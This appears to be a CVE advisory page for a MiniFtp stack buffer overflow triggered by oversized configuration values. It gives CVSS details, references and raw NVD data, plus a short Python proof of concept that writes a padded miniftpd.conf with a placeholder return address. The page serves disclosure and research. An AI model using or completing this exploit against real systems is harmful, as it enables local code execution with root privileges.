CVE-2019-25611

Description

MiniFtp contains a buffer overflow vulnerability in the parseconf_load_setting function that allows local attackers to execute arbitrary code by supplying oversized configuration values. Attackers can craft a miniftpd.conf file with values exceeding 128 bytes to overflow stack buffers and overwrite the return address, enabling code execution with root privileges.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MiniFtp

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2019-25611 MiniFtp Buffer Overflow
# Generates a malicious miniftpd.conf to crash the service or execute code

import os

# Configuration key to target (example based on typical ftp configs)
# The vulnerability triggers when a value exceeds 128 bytes.
# Payload: Padding (A) + Return Address overwrite (BBBB)
offset = 128
ret_addr = b"BBBB" # Placeholder for return address
padding = b"A" * offset
payload = padding + ret_addr

# Create the malicious configuration file
config_content = b"username=" + payload + b"\n"

filename = "miniftpd.conf"
with open(filename, "wb") as f:
    f.write(config_content)

print(f"[+] Created malicious configuration file: {filename}")
print("[+] Replace the original configuration file and restart MiniFtp to trigger the overflow.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25611
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25611
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25611/
[4] VulDB https://vuldb.com/cve/CVE-2019-25611
[5] https://github.com/skyqinsc/MiniFtp
[6] https://www.exploit-db.com/exploits/46807
[7] https://www.vulncheck.com/advisories/miniftp-parseconf-load-setting-buffer-overflow-via-configuration

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25611", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:29.360", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "MiniFtp contains a buffer overflow vulnerability in the parseconf_load_setting function that allows local attackers to execute arbitrary code by supplying oversized configuration values. Attackers can craft a miniftpd.conf file with values exceeding 128 bytes to overflow stack buffers and overwrite the return address, enabling code execution with root privileges."}, {"lang": "es", "value": "MiniFtp contiene una vulnerabilidad de desbordamiento de búfer en la función parseconf_load_setting que permite a atacantes locales ejecutar código arbitrario al proporcionar valores de configuración excesivamente grandes. Los atacantes pueden crear un archivo miniftpd.conf con valores que excedan los 128 bytes para desbordar los búferes de la pila y sobrescribir la dirección de retorno, lo que permite la ejecución de código con privilegios de root."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://github.com/skyqinsc/MiniFtp", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46807", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/miniftp-parseconf-load-setting-buffer-overflow-via-configuration", "source": "[email protected]"}]}}